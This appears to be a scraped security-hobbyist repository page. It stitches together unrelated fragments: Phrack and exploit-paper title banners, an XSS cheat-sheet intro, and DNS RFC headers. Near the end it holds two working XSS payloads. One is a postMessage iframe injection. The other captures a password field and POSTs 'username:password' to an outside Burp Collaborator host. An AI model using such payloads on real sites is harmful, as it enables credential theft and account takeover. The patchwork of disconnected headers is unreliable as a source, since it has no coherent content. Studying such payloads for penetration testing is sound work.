:octocat:
Breaking stuff

PikaChu cyberheartmi9

==Phrack Inc.==
0x0b, Issue 0x3b, Phile #0x07 of 0x12
|=-------------=[ Advances in format string exploitation ]=--------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ by gera <gera@corest.com>, riq <riq@corest.com> ]=---------=|
1 - Intro
.oO Phrack 49 Oo.
Volume Seven, Issue Forty-Nine
File 14 of 16
BugTraq, r00t, and Underground.Org
bring you
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|=-----------------------------------------------------------------------=|
|=-------------=[ Pwning PHP mail() function For Fun And RCE ]=---------=|
|=---------------=[ New Exploitation Techniques And Vectors ]=-----------=|
|=----------------------------=[ Release 1.0 ]=--------------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------=[ by https://legalhackers.com/ ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ https://ExploitBox.io ]=-------------------=|
|=---------------------=[ @Exploit_Box ]=-------------------=|
From Zero to ZeroDay Journey: Router Hacking (WRT54GL Linksys Case)
===================================================================
- Leon Juranic <leon[at]defensecode.com>
http://www.defensecode.com/
Date: 03/10/2013
.oO NOP Ninjas Oo.
presents: [Format String Technique]
www.nopninjas.com
_____ _ _ _ __ _______ _____ _____ _ _ _ _
| __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | |
| | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_
| | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_
\____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|
A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.
Simple character manipulations.
Internet Engineering Task Force (IETF) E. Lewis
Request for Comments: 5936 NeuStar, Inc.
Updates: 1034, 1035 A. Hoenes, Ed.
Category: Standards Track TR-Sys
Network Working Group P. Mockapetris
Request for Comments: 1035 ISI
November 1987
Obsoletes: RFCs 882, 883, 973
DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION
1. STATUS OF THIS MEMO
########################## xss using postmessage api ###############
<iframe src="//vulnerable-website" onload="this.contentWindow.postMessage('alert(1)','*')">
################ Exploiting cross-site scripting to capture passwords ############################################
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://lolo.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
#########################hunting phishing site ############################
Network Working Group P. Mockapetris
Request for Comments: 1034 ISI
Obsoletes: RFCs 882, 883, 973 November 1987
DOMAIN NAMES - CONCEPTS AND FACILITIES
1. STATUS OF THIS MEMO